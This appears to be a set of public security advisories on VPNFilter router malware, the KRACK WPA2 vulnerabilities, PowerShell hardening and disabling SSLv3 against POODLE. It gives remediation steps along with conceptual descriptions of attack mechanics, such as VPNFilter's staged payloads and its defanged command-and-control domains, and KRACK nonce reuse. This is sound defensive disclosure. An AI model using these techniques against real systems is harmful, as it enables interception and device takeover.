Security Advisory (S18-01) – Protect your routers from VPNFilter malware attack

Published on: 11 September 2018
Updated on: 5 October 2018


VPNFilter is a malware designed to infect small office and home office (SOHO) network equipment including routers and network-attached storage (NAS) devices which would allow hackers to perform man-in-the-middle attacks on traffic going through vulnerable routers, gather credentials, and obtain supervisory control. In May 2018, security researchers warned that the VPNFilter malware might have infected over 500,000 devices in 54 countries since 2016.

All users of SOHO network equipment are advised to reboot their routers and NAS devices to temporarily disrupt the malware and apply latest firmware update for safety. It is always a good practice to change the routers’ default password and disable remote management settings for stronger security.

Affected devices

The SOHO routers and NAS devices known to be targeted by VPNFilter are:

SOHO Routers

Vendor Model
ASUS RT-AC66U, RT-N10, RT-N10E, RT-N10U, RT-N56U, and RT-N66U
D-Link DES-1210-08P, DIR-300, DIR-300A, DSR-250N, DSR-500N, DSR-1000, and DSR-1000N
Huawei HG8245
Linksys E1200, E2500, E3000, E3200, E4200, RV082, and WRVS4400N
MikroTik CCR1009, CCR1016, CCR1036, CCR1072, CRS109, CRS112, CRS125, RB411, RB450, RB750, RB911, RB921, RB941, RB951, RB952, RB960, RB962, RB1100, RB1200, RB2011, RB3011, RB Groove, RB Omnitik, and STX5
NETGEAR DG834, DGN1000, DGN2200, DGN3500, FVS318N, MBRN3000, R6400, R7000, R8000, WNR1000, WNR2000, WNR2200, WNR4000, WNDR3700, WNDR4000, WNDR4300, WNDR4300-TN, and UTM50
TP-Link R600VPN, TL-WR741ND, and TL-WR841N
Ubiquiti NSM2 and PBE M5

Network-attached storage

Vendor Model
QNAP TS251, TS439 Pro, and other QNAP NAS devices running QTS software



In a small or home office environment, the affected devices may be exposed to the Internet without network perimeter defenses such as firewalls, intrusion protection systems, application proxies or virtual private network servers. Usually there is little or even no anti-malware support built in the affected devices. Novice users may not be capable of patching all publicly known vulnerabilities of the devices timely. These weaknesses add up to make the devices vulnerable to attack by VPNFilter.

Multi-stage attack

The initial attack vector is uncertain. The devices could however possibly be remotely attacked via publicly known vulnerabilities. Use of default or poor passwords may also allow attackers to brute force into the devices. Once VPNFilter is successfully installed on the devices, it will operate in three stages and download more malicious modules at each stage to perform different functions.

Stage 1 builds the foothold on the device and engages deployment servers for subsequent stages. A persistent loader is installed and added to the job scheduler by modifying the non-volatile memory (NVRAM) of the device. Thus the malware loaded at this stage could not be cleared by rebooting the device.

Stage 2 provides functions to collect intelligence, execute commands, exfiltrate data, manage the device, and even overwrite the firmware to make the device unusable. This stage could however be removed after the device is power cycled.

Stage 3 offers more plug-ins modules for the stage 2 malware providing a variety of sophisticated hacking functions, including packet sniffing, Tor network access, redirecting and inspecting web browsing traffic, forwarding network traffic to attacker specified infrastructure, blocking network access to specific IP addresses, scanning and mapping local networks for lateral movement of the malware, remote command execution, and establishing encrypted tunnels to evade detection for remote operation and data exfiltration. Rebooting the device could also delete the plug-ins at this stage.

Resilient malware control

VNPFilter downloads a photo from the image sharing host “photobucket[.]com” and derives the command and control (C2) server address from the GPS latitude and longitude values of the photo. It reserves another domain “toknowall[.]com” as a backup site for downloading the same photo. In case it fails to get the C2 server address from both domains, it listens and waits for a specific trigger packet from the threat actor. On receiving the packet meeting predefined criteria, VPNFilter extracts the C2 server address from the packet.


Confidentiality is compromised because an infected device is where users’ network traffic passes through. VPNFilter could monitor communications, intercept traffic, and exfiltrate user information. Even if a HTTPS website is accessed, the malware could perform the man-in-the-middle attack to turn the request for encrypted HTTPS communication into unencrypted HTTP access.

Permanent destruction is enabled by VPNFilter’s stage 2 malware, which could execute commands to destroy the device firmware and render the device inoperable. The destruction is not recoverable or reversible by most non-technical consumers. Even worse, a global black-out of consumers’ Internet access may be triggered given that so many network perimeter devices could have been infected.

Endpoint infection is facilitated since VPNFilter could inject exploit code or malicious content into traffic through the infected network device to reach the user’s endpoint device.

Further attacks could be launched by the attacker from the devices infected with VPNFilter to other systems over the Internet. As their infected devices become the launch pads of further attacks, the innocent users would be subject to blacklisting, blocking and fight-back from other victims, while the original source of attack is hidden behind the infected devices.


Owners of affected devices are advised to:

  1. Reboot your device as a precaution to temporarily disrupt possible malware operations.
  2. Upgrade your device to the latest available firmware version to ensure that it is fully patched against known vulnerabilities.
  3. Change the default credentials and set strong passwords for logging in your device.
  4. Disable Internet access of the admin interface of your device.
  5. Deploy additional security protections such as firewalls and anti-malware solutions between your network device and endpoint devices.

If your device is infected:

  1. Disconnect your device from the Internet.
  2. Reset your device to factory default and restore your configuration from clean backup.
  3. Change to a new administrator password.
  4. Apply the latest patches and updates for your device after reconnecting it to the Internet.

Further Reading

US-CERT Alert(TA18-145A)

New VPNFilter malware targets at least 500K networking devices worldwide

VPNFilter Update - VPNFilter exploits endpoints, targets new devices

VPNFilter III: More Tools for the Swiss Army Knife of Malware

Security Advisory (S17-01) – Secure Your Wi-Fi networks against WPA/WPA2 Vulnerabilities

Published on: 24 October 2017
Updated on: 22 November 2017


The Wi-Fi Protected Access (WPA and WPA2) security encryption protocols, developed by the Wi-Fi Alliance to enhance the security of Wi-Fi networks, have multiple vulnerabilities that let threat actors to eavesdrop on your network traffic, decrypt traffic, hijack connections, and perform man-in-the-middle (MitM) attacks. All network devices that use WPA and WPA2 without applying relevant patches are vulnerable.

Security researchers disclosed the findings in October 2017 and named the vulnerabilities as KRACK (Key Reinstallation AttaCKs), which exploit weaknesses in the standard-based WPA and WPA2 security protocols to compromise confidentiality and integrity of Wi-Fi communications. In total, ten vulnerabilities were identified. Nine of them require client operating system updates to patch mobile devices, including notebooks, mobile phones, tablets and the like. The tenth one demands a firmware fix at the roaming feature of Wi-Fi access points (APs).

Users are strongly advised to deploy secondary protection such as virtual private networks (VPNs), Transport Layer Security (TLS) or Secure Shell (SSH) to encrypt and protect data confidentiality of a Wi-Fi network connection if there is any doubt on the security measures of a Wi-Fi access point when using public Wi-Fi services.

Vulnerabilities and Impacts

WPA and WPA2 are widely deployed in Wi-Fi clients and APs. The weaknesses are in the protocol itself and therefore all compliant implementations of WPA/WPA2 are vulnerable. A successful attack may lead to information leakage, forgery, obstruction of communication or other damages.

The involved vulnerabilities are summarised as follows:

Relevant Vulnerability Exploitable handshake process Systems Affected
CVE-2017-13077 4-Way handshake
  • Clients authenticate to the network
Wi-Fi clients using OS X, macOS, Android, OpenBSD, MediaTek, wpa_supplicant
Group Key handshake
  • Client renegotiate keys for broadcasting and multicasting frames
Wi-Fi clients using OS X, macOS, iOS, Android, OpenBSD, Windows, MediaTek, wpa_supplicant
CVE-2017-13082 Fast-BSS transition handshake
  • Speed up moving clients to join and disjoin APs
Wi-Fi routers, Wi-Fi APs
PeerKey handshake
  • Two clients connect to each other
Wi-Fi clients using wpa_supplicant

US-CERT has published a list of vendors who have disclosed if they are affected and their solutions.


For owners/ users of Wi-Fi clients including notebooks, mobile phones, and Internet connected devices:

  1. Upgrade the affected operating systems for mobile devices to their latest releases.
  2. Use HTTPS (SSL/TLS) or VPN on top of WPA/WPA2 to process personal, confidential or sensitive information.
  3. Turn off Wi-Fi function when not in use.

For owners / administrators of Wi-Fi network devices, like APs and routers:

  1. Perform firmware upgrade for the APs and routers when the recommended updates that fix the FT vulnerability (CVE-2017-13082) are available.
  2. Disable the 802.11r fast roaming feature of the Wi-Fi network devices before the firmware upgrade is performed.

For service providers of public Wi-Fi and hotspots:

  1. Perform firmware upgrade for the APs and routers when the recommended updates that fix the FT vulnerability (CVE-2017-13082) are available.
  2. Disable the 802.11r fast roaming feature of the Wi-Fi network devices before the firmware upgrade is performed.
  3. Inform your mobile clients to upgrade or patch their mobile computers or devices.
  4. Enforce layer-2 isolation which blocks direct client-to-client communication and thereby avoids the attack on PeerKey handshake.
  5. Deploy wireless intrusion protection systems to detect wireless attacks and provide real-time alerts with a view to preventing users from mis-associating with rogue APs, which enable MitM attacks.

What is KRACK?

According to the security researchers who discovered the weaknesses, KRACK targets on four types of cryptographic Wi-Fi handshakes, including the 4-Way handshake, Group Key handshake, 802.11r Fast-BSS Transition (FT) handshake and PeerKey handshake. An attacker within Wi-Fi proximity of a targeted wireless AP and network devices is able to exploit the vulnerabilities by spoofing the network and forcing the network devices to connect to it instead of the legitimate AP.

The 4-Way handshake is used to generate a new session key for protected Wi-Fi networks. A man-in-the-middle (MitM) attacker intercepts and manipulates the handshake frames between the client and the AP to cause the client to reinstall an already-in-use key. The key reinstallation resets the used once secret counter called nonce to its initial value. The nonce is then reused to encrypt subsequent data frames, allowing the attacker to replay, decrypt, or forge frames. Since Windows and Apple iOS do not follow the 802.11 WPA standard to implement the 4-Way handshake, the operating systems are not vulnerable to the attack against the 4-Way handshake. On the other hand, Android 6.0 will even install a predictable all-zero encryption key when the key reinstallation message is received, owing to a program bug.

The Group Key handshake is used to distribute a group key used by the AP to encrypt broadcast or multicast frames to be sent to all or multiple clients. A MitM attack on the Group Key handshake causes the client to perform group key reinstallation. As a result, the group key replay counter is reset, enabling the attacker to replay the broadcast/multicast frame sent before. All Wi-Fi clients, including Windows, Apple iOS, Android, Linux and others are vulnerable to the attack against the Group Key handshake.

802.11r or Fast Basic Service Set Transition (FT) handshake is to reduce the roaming time when a client moves from one AP to another of the same network. The attack against the FT handshake does not require a MitM position. Being able to eavesdrop and inject frames is sufficient. The attacker replays the handshake frame to trigger key reinstallation at the AP, thereby reinitializing the associated nonce and replay counter and facilitating the replay of data frames sent by the client to the AP.

The PeerKey handshake is used when two clients communicate with each other directly without going through an AP. Since part of the handshake is based on the 4-way handshake, it can be attacked in exactly the same manner as the 4-Way handshake.

Further Reading

US-CERT Alert (VU#228519)

Key Reinstallation Attacks - Breaking WPA2 by forcing nonce reuse

Wi-Fi Alliance security update October 2017

Guidelines on the Security Aspects for the Design, Implementation, Management and Operation of Public Wi-Fi Service, Office of the Communications Authority

Security Advisory (S16-01) – Securing Microsoft Windows PowerShell

Published on: 28 December 2016

Issue Description

Researchers and security vendors warned that Microsoft Windows PowerShell security threats are on a rise and recommended immediate actions to upgrade the PowerShell automation tools and hardening the Microsoft Windows to guard against possible abuse by attackers.


PowerShell is a powerful command-line shell and task-based scripting language built into all supported versions of Microsoft Windows. It is designed for system administrators and power-users to automate the administration of the operating systems and the processes related to the applications, such as Microsoft Office and web browsers, that run on those operating systems.

Attackers are capable of gaining control of computers without downloading any malware programs to disks when they gain access to PowerShell. It can directly execute commands in memory and store instructions in registries without saving any malicious software on disks, leaving little trace for monitoring, detection and analysis. The remote access capabilities also come with default encryption, making it easier to bypass the surveillance of network-based intrusion detection systems. Malicious PowerShell activities would be hardly visible in the event logs when blended into legitimate PowerShell operations.

Attackers are increasingly using this kind of file-less malware attacks to keep undetected and persistent on the victim’s computers and networks. This is not due to any vulnerability within PowerShell, rather it is an indication of the importance to properly configure this powerful system administration tools and the essence of patch management.


Suggested Actions:

  1. Upgrade to the latest PowerShell version 5. The current version, PowerShell 5, is equipped with more effective defenses against threats compared with previous versions, such as strengthened logging capabilities and integration with anti-malware scan interface (AMSI).
  2. Enforce script execution policy with group policies and code signing certificates. All scripts to be run on user computers have to be signed by a Trusted Publisher so as to prevent malicious scripts from executing.
  3. Whitelist scripts and access to PowerShell hosts. Scripts to run and access to both default and custom PowerShell hosts should be restricted to specific system administrators or users on need basis.
  4. Enable PowerShell event logging. PowerShell 5 provides extended logging methods to facilitate detection and analysis of suspicious PowerShell activities.
  5. Lock down PowerShell. The Constrained Language Mode of PowerShell should be set to “NoLanguage” to reduce the functionality for interactive input and user-authored scripts, thus limiting the attack surface by malicious PowerShell scripts.
  6. Harden PowerShell remoting. WinRM client and service should be configured via group policy to remove all unnecessary protocols, disable stored credentials and legacy network ports (such as ports 80 and 443).

Other Information

Despite its file-less execution capabilities, PowerShell can only be run if the attacker gains access to a system. It requires common initial attack vectors, such as phishing emails and drive-by downloads, to step into the target systems. In addition to securing the PowerShell configuration, the front line of defense should be practicing good cyber hygiene actions.
Additional Suggested Actions:

  1. Update operating systems, application software and device firmware with latest versions and security patches;
  2. Maintain anti-malware signatures and engines up-to-date;
  3. Disable unnecessary services on systems;
  4. Grant minimum system access rights to users, restricting them from installing and running unnecessary software applications;
  5. Advise users to immediately delete any suspicious emails and be vigilant of attachments and hyperlinks;
  6. Advise users to avoid re-enabling macros in Office documents even if prompted to;
  7. Back up data regularly and secure the offline backup;
  8. Deploy firewalls to separate networks and block malicious traffic;
  9. Enable anti-spam filters to block phishing emails;
  10. Enable Ad-blocker at web browsers;
  11. Conduct regular vulnerability scan and penetration test on systems; and
  12. Maintain situational awareness of the latest threats to formulate timely responses.


Microsoft Developer Network, PowerShell,

Microsoft Windows Management Framework 5.0

Securing PowerShell in the Enterprise, Australian Cyber Security Centre

Security Advisory (S15-01) – Disable Secure Sockets Layer Version 3 (SSLv3)

Published on: 15 May 2015

Issue Description

The Secure Sockets Layer version 3 (SSLv3) is an obsolete and insecure protocol, and has been replaced by the Transport Layer Security (TLS) protocols.

Both the SSL and TLS are cryptographic protocols designed to provide communications security over a computer network. They use X.509 certificates and hence asymmetric cryptography to authenticate the counterparty with whom they are communicating and to encrypt the communication between web servers and browsers using the HyperText Transfer Protocol Secure (HTTPS).


The vulnerability in the design of SSLv3 allows the plaintext of secure connections to be calculated by an attacker. The “Padding Oracle On Downgraded Legacy Encryption, POODLE” attack compromises encryption by forcing the web server and browser to use the less secure SSLv3 instead of TLS protocols. It then carries out a “Browser Exploit Against SSL/TLS, BEAST” attack to obtain information from the encrypted data stream. Such man-in-the-middle attacks require large amounts of time and resources and the risk is relatively low.

SSLv3 has been used for over 15 years and nearly all browsers still support it. Attacker can cause connection failures and force the web servers and browsers to retry failed connections with older protocols including SSLv3 so as to launch fallback attack.


There is no patch to fix this vulnerability and the only solution is to disable SSLv3 as an accepted secure protocol on all web servers and browsers. Please be reminded to test thoroughly before deploying changes to production environment.

What Web Server Administrators Need to Do

1. Check if the web servers are vulnerable
2. Disable SSLv3 altogether
3. Apply latest patches

Action Reference Tool
check if SSLv3 is enabled Qualys SSL Server Test
change configuration settings POODLE: Turning off SSLv3 for various servers and client by SANS Internet Storm Center

  What Web Browser Users Need to Do

1. Check if the web browsers are vulnerable
2. Make sure “HTTPS” is on when encryption of communications would be expected
3. Use update software

Action Reference Tool
check if the web browsers are vulnerable SSLv3 POODLE Attack Check
upgrade to the latest versions or change browser settings POODLE: Turning off SSLv3 for various servers and client by SANS Internet Storm Center


CVE-2014-3566 SSLv3 POODLE Vulnerability